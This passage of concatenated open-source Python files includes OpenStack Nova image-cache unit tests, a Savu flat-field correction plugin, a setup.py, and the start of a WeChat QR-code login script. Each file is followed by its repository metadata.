image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_resized(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'instance-00000001',
'instance-00000002', 'instance-00000003'])
self.stub_out('os.path.exists',
lambda x: x.find('instance-') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: ('e97222e91fc4241f49a7f520d1dcf446751129b3_'
'10737418240'))
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_'
'10737418240')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_instancename(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'banana-42-hamster'])
self.stub_out('os.path.exists',
lambda x: x.find('banana-42-hamster') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: 'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [found]
image_cache_manager.instance_names = self.stock_instance_names
inuse_images = image_cache_manager._list_backing_images()
self.assertEqual(inuse_images, [found])
self.assertEqual(len(image_cache_manager.unexplained_images), 0)
def test_list_backing_images_disk_notexist(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'banana-42-hamster'])
self.stub_out('os.path.exists',
lambda x: x.find('banana-42-hamster') != -1)
def fake_get_disk(disk_path):
raise processutils.ProcessExecutionError()
self.stubs.Set(libvirt_utils, 'get_disk_backing_file', fake_get_disk)
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = []
image_cache_manager.instance_names = self.stock_instance_names
self.assertRaises(processutils.ProcessExecutionError,
image_cache_manager._list_backing_images)
def test_find_base_file_nothing(self):
self.stub_out('os.path.exists', lambda x: False)
base_dir = '/var/lib/nova/instances/_base'
fingerprint = '549867354867'
image_cache_manager = imagecache.ImageCacheManager()
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
self.assertEqual(0, len(res))
def test_find_base_file_small(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
self.stub_out('os.path.exists',
lambda x: x.endswith('%s_sm' % fingerprint))
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file = os.path.join(base_dir, fingerprint + '_sm')
self.assertEqual(res, [(base_file, True, False)])
def test_find_base_file_resized(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
listing = ['00000001',
'ephemeral_0_20_None',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_10737418240',
'00000004']
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.exists',
lambda x: x.endswith('%s_10737418240' % fingerprint))
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file = os.path.join(base_dir, fingerprint + '_10737418240')
self.assertEqual(res, [(base_file, False, True)])
def test_find_base_file_all(self):
fingerprint = '968dd6cc49e01aaa044ed11c0cce733e0fa44a6a'
listing = ['00000001',
'ephemeral_0_20_None',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_sm',
'968dd6cc49e01aaa044ed11c0cce733e0fa44a6a_10737418240',
'00000004']
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.exists', lambda x: True)
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
res = list(image_cache_manager._find_base_file(base_dir, fingerprint))
base_file1 = os.path.join(base_dir, fingerprint)
base_file2 = os.path.join(base_dir, fingerprint + '_sm')
base_file3 = os.path.join(base_dir, fingerprint + '_10737418240')
self.assertEqual(res, [(base_file1, False, False),
(base_file2, True, False),
(base_file3, False, True)])
@contextlib.contextmanager
def _make_base_file(self, checksum=True, lock=True):
"""Make a base file for testing."""
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
base_file = open(fname, 'w')
base_file.write('data')
base_file.close()
if lock:
lockdir = os.path.join(tmpdir, 'locks')
lockname = os.path.join(lockdir, 'nova-aaa')
os.mkdir(lockdir)
lock_file = open(lockname, 'w')
lock_file.write('data')
lock_file.close()
base_file = open(fname, 'r')
if checksum:
imagecache.write_stored_checksum(fname)
base_file.close()
yield fname
def test_remove_base_file(self):
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
info_fname = imagecache.get_info_filename(fname)
lock_name = 'nova-' + os.path.split(fname)[-1]
lock_dir = os.path.join(CONF.instances_path, 'locks')
lock_file = os.path.join(lock_dir, lock_name)
# Files are initially too new to delete
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
self.assertTrue(os.path.exists(lock_file))
# Old files get cleaned up though
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager._remove_base_file(fname)
self.assertFalse(os.path.exists(fname))
self.assertFalse(os.path.exists(info_fname))
self.assertFalse(os.path.exists(lock_file))
def test_remove_base_file_original(self):
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.originals = [fname]
image_cache_manager._remove_base_file(fname)
info_fname = imagecache.get_info_filename(fname)
# Files are initially too new to delete
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
# This file should stay longer than a resized image
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager._remove_base_file(fname)
self.assertTrue(os.path.exists(fname))
self.assertTrue(os.path.exists(info_fname))
# Originals don't stay forever though
os.utime(fname, (-1, time.time() - 3600 * 25))
image_cache_manager._remove_base_file(fname)
self.assertFalse(os.path.exists(fname))
self.assertFalse(os.path.exists(info_fname))
def test_remove_base_file_dne(self):
# This test is solely to execute the "does not exist" code path. We
# don't expect the method being tested to do anything in this case.
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
def test_remove_base_file_oserror(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
os.mkdir(fname)
os.utime(fname, (-1, time.time() - 3601))
# This will raise an OSError because of file permissions
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_base_file(fname)
self.assertTrue(os.path.exists(fname))
self.assertNotEqual(stream.getvalue().find('Failed to remove'),
-1)
def test_handle_base_image_unused(self):
img = '123'
with self._make_base_file() as fname:
os.utime(fname, (-1, time.time() - 3601))
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager._handle_base_image(img, fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files,
[fname])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_used(self, mock_mtime):
img = '123'
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_used_remotely(self, mock_mtime):
img = '123'
with self._make_base_file() as fname:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (0, 1, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
def test_handle_base_image_absent(self):
img = '123'
with intercept_log_messages() as stream:
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, None)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
self.assertNotEqual(stream.getvalue().find('an absent base file'),
-1)
def test_handle_base_image_used_missing(self):
img = '123'
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files, [])
@mock.patch.object(libvirt_utils, 'update_mtime')
def test_handle_base_image_checksum_fails(self, mock_mtime):
self.flags(checksum_base_images=True, group='libvirt')
img = '123'
with self._make_base_file() as fname:
with open(fname, 'w') as f:
f.write('banana')
d = {'sha1': '21323454'}
with open('%s.info' % fname, 'w') as f:
f.write(jsonutils.dumps(d))
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.unexplained_images = [fname]
image_cache_manager.used_images = {'123': (1, 0, ['banana-42'])}
image_cache_manager._handle_base_image(img, fname)
mock_mtime.assert_called_once_with(fname)
self.assertEqual(image_cache_manager.unexplained_images, [])
self.assertEqual(image_cache_manager.removable_base_files, [])
self.assertEqual(image_cache_manager.corrupt_base_files,
[fname])
@mock.patch.object(libvirt_utils, 'update_mtime')
@mock.patch.object(lockutils, 'external_lock')
def test_verify_base_images(self, mock_lock, mock_mtime):
hashed_1 = '356a192b7913b04c54574d18c28d46e6395428ab'
hashed_21 = '472b07b9fcf2c2451e8781e944bf5f77cd8457c8'
hashed_22 = '12c6fc06c99a462375eeb3f43dfd832b08ca9e17'
hashed_42 = '92cfceb39d57d914ed8b14d0e37643de0797ae56'
self.flags(instances_path='/instance_path',
image_cache_subdirectory_name='_base')
base_file_list = ['00000001',
'ephemeral_0_20_None',
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm',
'e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm',
hashed_42,
hashed_1,
hashed_21,
hashed_22,
'%s_5368709120' % hashed_1,
'%s_10737418240' % hashed_1,
'00000004']
def fq_path(path):
return os.path.join('/instance_path/_base/', path)
# Fake base directory existence
orig_exists = os.path.exists
def exists(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_exists(path)
if path in ['/instance_path',
'/instance_path/_base',
'/instance_path/instance-1/disk',
'/instance_path/instance-2/disk',
'/instance_path/instance-3/disk',
'/instance_path/_base/%s.info' % hashed_42]:
return True
for p in base_file_list:
if path == fq_path(p):
return True
if path == fq_path(p) + '.info':
return False
if path in ['/instance_path/_base/%s_sm' % i for i in [hashed_1,
hashed_21,
hashed_22,
hashed_42]]:
return False
self.fail('Unexpected path existence check: %s' % path)
self.stub_out('os.path.exists', lambda x: exists(x))
# Fake up some instances in the instances directory
orig_listdir = os.listdir
def listdir(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_listdir(path)
if path == '/instance_path':
return ['instance-1', 'instance-2', 'instance-3', '_base']
if path == '/instance_path/_base':
return base_file_list
self.fail('Unexpected directory listed: %s' % path)
self.stub_out('os.listdir', lambda x: listdir(x))
# Fake isfile for these faked images in _base
orig_isfile = os.path.isfile
def isfile(path):
# The python coverage tool got angry with my overly broad mocks
if not path.startswith('/instance_path'):
return orig_isfile(path)
for p in base_file_list:
if path == fq_path(p):
return True
self.fail('Unexpected isfile call: %s' % path)
self.stub_out('os.path.isfile', lambda x: isfile(x))
# Fake the database call which lists running instances
instances = [{'image_ref': '1',
'host': CONF.host,
'name': 'instance-1',
'uuid': '123',
'vm_state': '',
'task_state': ''},
{'image_ref': '1',
'kernel_id': '21',
'ramdisk_id': '22',
'host': CONF.host,
'name': 'instance-2',
'uuid': '456',
'vm_state': '',
'task_state': ''}]
all_instances = [fake_instance.fake_instance_obj(None, **instance)
for instance in instances]
image_cache_manager = imagecache.ImageCacheManager()
# Fake the utils call which finds the backing image
def get_disk_backing_file(path):
if path in ['/instance_path/instance-1/disk',
'/instance_path/instance-2/disk']:
return fq_path('%s_5368709120' % hashed_1)
self.fail('Unexpected backing file lookup: %s' % path)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: get_disk_backing_file(x))
# Fake out verifying checksums, as that is tested elsewhere
self.stubs.Set(image_cache_manager, '_verify_checksum',
lambda x, y: True)
# Fake getmtime as well
orig_getmtime = os.path.getmtime
def getmtime(path):
if not path.startswith('/instance_path'):
return orig_getmtime(path)
return 1000000
self.stub_out('os.path.getmtime', lambda x: getmtime(x))
# Make sure we don't accidentally remove a real file
orig_remove = os.remove
def remove(path):
if not path.startswith('/instance_path'):
return orig_remove(path)
# Don't try to remove fake files
return
self.stub_out('os.remove', lambda x: remove(x))
self.mox.StubOutWithMock(objects.block_device.BlockDeviceMappingList,
'get_by_instance_uuid')
ctxt = context.get_admin_context()
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '123').AndReturn(None)
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '456').AndReturn(None)
self.mox.ReplayAll()
# And finally we can make the call we're actually testing...
# The argument here should be a context, but it is mocked out
image_cache_manager.update(ctxt, all_instances)
# Verify
active = [fq_path(hashed_1), fq_path('%s_5368709120' % hashed_1),
fq_path(hashed_21), fq_path(hashed_22)]
for act in active:
self.assertIn(act, image_cache_manager.active_base_files)
self.assertEqual(len(image_cache_manager.active_base_files),
len(active))
for rem in [fq_path('e97222e91fc4241f49a7f520d1dcf446751129b3_sm'),
fq_path('e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm'),
fq_path(hashed_42),
fq_path('%s_10737418240' % hashed_1)]:
self.assertIn(rem, image_cache_manager.removable_base_files)
# Ensure there are no "corrupt" images as well
self.assertEqual(len(image_cache_manager.corrupt_base_files), 0)
def test_verify_base_images_no_base(self):
self.flags(instances_path='/tmp/no/such/dir/name/please')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.update(None, [])
def test_is_valid_info_file(self):
hashed = 'e97222e91fc4241f49a7f520d1dcf446751129b3'
self.flags(instances_path='/tmp/no/such/dir/name/please')
self.flags(image_info_filename_pattern=('$instances_path/_base/'
'%(image)s.info'),
group='libvirt')
base_filename = os.path.join(CONF.instances_path, '_base', hashed)
is_valid_info_file = imagecache.is_valid_info_file
self.assertFalse(is_valid_info_file('banana'))
self.assertFalse(is_valid_info_file(
os.path.join(CONF.instances_path, '_base', '00000001')))
self.assertFalse(is_valid_info_file(base_filename))
self.assertFalse(is_valid_info_file(base_filename + '.sha1'))
self.assertTrue(is_valid_info_file(base_filename + '.info'))
def test_configured_checksum_path(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
# Ensure there is a base directory
os.mkdir(os.path.join(tmpdir, '_base'))
# Fake the database call which lists running instances
instances = [{'image_ref': '1',
'host': CONF.host,
'name': 'instance-1',
'uuid': '123',
'vm_state': '',
'task_state': ''},
{'image_ref': '1',
'host': CONF.host,
'name': 'instance-2',
'uuid': '456',
'vm_state': '',
'task_state': ''}]
all_instances = []
for instance in instances:
all_instances.append(fake_instance.fake_instance_obj(
None, **instance))
def touch(filename):
f = open(filename, 'w')
f.write('Touched')
f.close()
old = time.time() - (25 * 3600)
hashed = 'e97222e91fc4241f49a7f520d1dcf446751129b3'
base_filename = os.path.join(tmpdir, hashed)
touch(base_filename)
touch(base_filename + '.info')
os.utime(base_filename + '.info', (old, old))
touch(base_filename + '.info')
os.utime(base_filename + '.info', (old, old))
self.mox.StubOutWithMock(
objects.block_device.BlockDeviceMappingList,
'get_by_instance_uuid')
ctxt = context.get_admin_context()
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '123').AndReturn(None)
objects.block_device.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, '456').AndReturn(None)
self.mox.ReplayAll()
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager.update(ctxt,
all_instances)
self.assertTrue(os.path.exists(base_filename))
self.assertTrue(os.path.exists(base_filename + '.info'))
def test_run_image_cache_manager_pass(self):
was = {'called': False}
def fake_get_all_by_filters(context, *args, **kwargs):
was['called'] = True
instances = []
for x in range(2):
instances.append(fake_instance.fake_db_instance(
image_ref='1',
uuid=x,
name=x,
vm_state='',
task_state=''))
return instances
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.stub_out('nova.db.instance_get_all_by_filters',
fake_get_all_by_filters)
compute = importutils.import_object(CONF.compute_manager)
self.flags(use_local=True, group='conductor')
compute.conductor_api = conductor.API()
ctxt = context.get_admin_context()
compute._run_image_cache_manager_pass(ctxt)
self.assertTrue(was['called'])
def test_store_swap_image(self):
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._store_swap_image('swap_')
image_cache_manager._store_swap_image('swap_123')
image_cache_manager._store_swap_image('swap_456')
image_cache_manager._store_swap_image('swap_abc')
image_cache_manager._store_swap_image('123_swap')
image_cache_manager._store_swap_image('swap_129_')
self.assertEqual(len(image_cache_manager.back_swap_images), 2)
expect_set = set(['swap_123', 'swap_456'])
self.assertEqual(image_cache_manager.back_swap_images, expect_set)
@mock.patch.object(lockutils, 'external_lock')
@mock.patch.object(libvirt_utils, 'update_mtime')
@mock.patch('os.path.exists', return_value=True)
@mock.patch('os.path.getmtime')
@mock.patch('os.remove')
def test_age_and_verify_swap_images(self, mock_remove, mock_getmtime,
mock_exist, mock_mtime, mock_lock):
image_cache_manager = imagecache.ImageCacheManager()
expected_remove = set()
expected_exist = set(['swap_128', 'swap_256'])
image_cache_manager.back_swap_images.add('swap_128')
image_cache_manager.back_swap_images.add('swap_256')
image_cache_manager.used_swap_images.add('swap_128')
def getmtime(path):
return time.time() - 1000000
mock_getmtime.side_effect = getmtime
def removefile(path):
if not path.startswith('/tmp_age_test'):
return os.remove(path)
fn = os.path.split(path)[-1]
expected_remove.add(fn)
expected_exist.remove(fn)
mock_remove.side_effect = removefile
image_cache_manager._age_and_verify_swap_images(None, '/tmp_age_test')
self.assertEqual(1, len(expected_exist))
self.assertEqual(1, len(expected_remove))
self.assertIn('swap_128', expected_exist)
self.assertIn('swap_256', expected_remove)
@mock.patch.object(utils, 'synchronized')
@mock.patch.object(imagecache.ImageCacheManager, '_get_age_of_file',
return_value=(True, 100))
def test_lock_acquired_on_removing_old_enough_files(self, mock_get_age,
mock_synchronized):
base_file = '/tmp_age_test'
lock_path = os.path.join(CONF.instances_path, 'locks')
lock_file = os.path.split(base_file)[-1]
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._remove_old_enough_file(
base_file, 60, remove_sig=False, remove_lock=False)
mock_synchronized.assert_called_once_with(lock_file, external=True,
lock_path=lock_path)
class VerifyChecksumTestCase(test.NoDBTestCase):
def setUp(self):
super(VerifyChecksumTestCase, self).setUp()
self.img = {'container_format': 'ami', 'id': '42'}
self.flags(checksum_base_images=True, group='libvirt')
def _make_checksum(self, tmpdir):
testdata = ('OpenStack Software delivers a massively scalable cloud '
'operating system.')
fname = os.path.join(tmpdir, 'aaa')
info_fname = imagecache.get_info_filename(fname)
with open(fname, 'w') as f:
f.write(testdata)
return fname, info_fname, testdata
def _write_file(self, info_fname, info_attr, testdata):
f = open(info_fname, 'w')
if info_attr == "csum valid":
csum = hashlib.sha1()
csum.update(testdata)
f.write('{"sha1": "%s"}\n' % csum.hexdigest())
elif info_attr == "csum invalid, not json":
f.write('banana')
else:
f.write('{"sha1": "banana"}')
f.close()
def _check_body(self, tmpdir, info_attr):
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname, info_fname, testdata = self._make_checksum(tmpdir)
self._write_file(info_fname, info_attr, testdata)
image_cache_manager = imagecache.ImageCacheManager()
return image_cache_manager, fname
def test_verify_checksum(self):
with utils.tempdir() as tmpdir:
image_cache_manager, fname = self._check_body(tmpdir, "csum valid")
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertTrue(res)
def test_verify_checksum_disabled(self):
self.flags(checksum_base_images=False, group='libvirt')
with utils.tempdir() as tmpdir:
image_cache_manager, fname = self._check_body(tmpdir, "csum valid")
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertIsNone(res)
def test_verify_checksum_invalid_json(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, not json"))
res = image_cache_manager._verify_checksum(
self.img, fname, create_if_missing=False)
self.assertFalse(res)
log = stream.getvalue()
# NOTE(mikal): this is a skip not a fail because the file is
# present, but is not in valid JSON format and therefore is
# skipped.
self.assertNotEqual(log.find('image verification skipped'), -1)
def test_verify_checksum_invalid_repaired(self):
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, not json"))
res = image_cache_manager._verify_checksum(
self.img, fname, create_if_missing=True)
self.assertIsNone(res)
def test_verify_checksum_invalid(self):
with intercept_log_messages() as stream:
with utils.tempdir() as tmpdir:
image_cache_manager, fname = (
self._check_body(tmpdir, "csum invalid, valid json"))
res = image_cache_manager._verify_checksum(self.img, fname)
self.assertFalse(res)
log = stream.getvalue()
self.assertNotEqual(log.find('image verification failed'), -1)
def test_verify_checksum_file_missing(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname, info_fname, testdata = self._make_checksum(tmpdir)
image_cache_manager = imagecache.ImageCacheManager()
res = image_cache_manager._verify_checksum('aaa', fname)
self.assertIsNone(res)
# Checksum requests for a file with no checksum now have the
# side effect of creating the checksum
self.assertTrue(os.path.exists(info_fname))
|
{
"content_hash": "2ead46d7799a4e1a95f87c2c562b84f3",
"timestamp": "",
"source": "github",
"line_count": 994,
"max_line_length": 79,
"avg_line_length": 42.18913480885312,
"alnum_prop": 0.5684853109500191,
"repo_name": "dims/nova",
"id": "62c193be5481ff8d218e2eb9373053e5e4c341be",
"size": "42584",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "nova/tests/unit/virt/libvirt/test_imagecache.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16952469"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "317320"
}
],
"symlink_target": ""
}
|
from dogapi.stats.dog_stats_api import DogStatsApi
|
{
"content_hash": "ffcc575aa46c8b174b97f0cc180e0b98",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 50,
"avg_line_length": 51,
"alnum_prop": 0.8431372549019608,
"repo_name": "DataDog/dogapi",
"id": "e003eb3e87ffde9e6d913eeea78dfd138f488a81",
"size": "51",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/dogapi/stats/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "178128"
},
{
"name": "Ruby",
"bytes": "1606"
}
],
"symlink_target": ""
}
|
"""
.. module:: Timeseries_field_corrections
:platform: Unix
:synopsis: A Plugin to apply a simple dark and flatfield correction to some
raw timeseries data
.. moduleauthor:: Mark Basham <scientificsoftware@diamond.ac.uk>
"""
from savu.data.structures import RawTimeseriesData, ProjectionData
from savu.plugins.cpu_plugin import CpuPlugin
from savu.plugins.plugin import Plugin
from savu.core.utils import logmethod
import numpy as np
from savu.plugins.utils import register_plugin
@register_plugin
class TimeseriesFieldCorrections(Plugin, CpuPlugin):
"""
A Plugin to apply a simple dark and flatfield correction to some
raw timeseries data
"""
def __init__(self):
super(TimeseriesFieldCorrections,
self).__init__("TimeseriesFieldCorrections")
@logmethod
def process(self, data, output, processes, process):
"""
"""
image_key = data.image_key[...]
# pull out the average dark and flat data; if the image key contains no
# dark (2) or flat (1) frames, fall back to neutral correction frames
try:
dark = np.mean(data.data[image_key == 2, :, :], 0)
except Exception:
dark = np.zeros((data.data.shape[1], data.data.shape[2]))
try:
flat = np.mean(data.data[image_key == 1, :, :], 0)
except Exception:
flat = np.ones((data.data.shape[1], data.data.shape[2]))
# shortcut to reduce processing
flat = flat - dark
# get a list of all the frames
projection_frames = np.arange(len(image_key))[image_key == 0]
output_frames = np.arange(len(projection_frames))
frames = np.array_split(output_frames, len(processes))[process]
# The rotation angle can just be pulled out of the file so write that
rotation_angle = data.rotation_angle[image_key == 0]
output.rotation_angle[:] = rotation_angle
for frame in frames:
projection = data.data[projection_frames[frame], :, :]
projection = (projection - dark) / flat  # flat already has dark subtracted above
output.data[frame, :, :] = projection
def required_resource(self):
"""
This plugin needs to use the CPU to work
:returns: CPU
"""
return "CPU"
def required_data_type(self):
"""
The input for this plugin is RawTimeseriesData
:returns: RawTimeseriesData
"""
return RawTimeseriesData
def output_data_type(self):
"""
The output of this plugin is ProjectionData
:returns: ProjectionData
"""
return ProjectionData
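# Illustrative sketch (added, not part of the original plugin): the core of
# process() above is plain numpy arithmetic. The frame values below are made
# up purely to show the (projection - dark) / (flat - dark) step in isolation.
if __name__ == '__main__':
    example_dark = np.array([[1.0, 1.0], [1.0, 1.0]])
    example_flat = np.array([[11.0, 11.0], [11.0, 11.0]])
    example_projection = np.array([[6.0, 3.0], [1.0, 11.0]])
    example_flat = example_flat - example_dark  # same shortcut as the plugin
    corrected = (example_projection - example_dark) / example_flat
    print(corrected)  # [[0.5, 0.2], [0.0, 1.0]]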
|
{
"content_hash": "107ac61da7fedba93bc694b917bd0db8",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 78,
"avg_line_length": 29.597701149425287,
"alnum_prop": 0.6139805825242718,
"repo_name": "swtp1v07/Savu",
"id": "938ac19eadee15dd2fd15058c03305826a2e3c4e",
"size": "3165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "savu/plugins/timeseries_field_corrections.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "84400"
},
{
"name": "C++",
"bytes": "509"
},
{
"name": "Makefile",
"bytes": "2126"
},
{
"name": "Python",
"bytes": "349231"
},
{
"name": "Shell",
"bytes": "6321"
}
],
"symlink_target": ""
}
|
from setuptools import find_packages, setup
setup(
name='blocks_extras',
install_requires=['blocks'],
packages=find_packages(),
scripts=['bin/blocks-plot', 'bin/blocks-controller'],
extras_require={'plot': ['bokeh']},
zip_safe=False
)
|
{
"content_hash": "181596c23aea4b20a85abcc4dacb75ff",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 57,
"avg_line_length": 26,
"alnum_prop": 0.6615384615384615,
"repo_name": "mila-udem/blocks-extras",
"id": "918342300e1ec06de984ea080ca0e69ca776d5e6",
"size": "260",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "88105"
}
],
"symlink_target": ""
}
|
import os, sys, platform
import requests, time, re, subprocess
import json, xml.dom.minidom
BASE_URL = 'https://login.weixin.qq.com'
OS = platform.system()
INTERACT_URL = None
session = requests.Session()
uuid = None
baseRequest = {}
def get_QRuuid():
url = '%s/jslogin'%BASE_URL
params = {
'appid': 'wx782c26e4c19acffb',
'fun': 'new',
}
r = session.get(url, params = params)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200': return data.group(2)
def get_QR():
url = '%s/qrcode/%s'%(BASE_URL, uuid)
r = session.get(url, stream = True)
with open('QR.jpg', 'wb') as f: f.write(r.content)
if OS == 'Darwin':
subprocess.call(['open', 'QR.jpg'])
elif OS == 'Linux':
subprocess.call(['xdg-open', 'QR.jpg'])
else:
os.startfile('QR.jpg')
def check_login(uuid):
url = '%s/cgi-bin/mmwebwx-bin/login'%BASE_URL
payloads = 'tip=1&uuid=%s&_=%s'%(uuid, int(time.time()))
r = session.get(url, params = payloads)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if not data: return False
def one_line_print(msg):
sys.stdout.write('%s\r'%msg)
sys.stdout.flush()
if data.group(1) == '200':
regx = r'window.redirect_uri="(\S+)";'
global INTERACT_URL
INTERACT_URL = re.search(regx, r.text).group(1)
r = session.get(INTERACT_URL, allow_redirects=False)
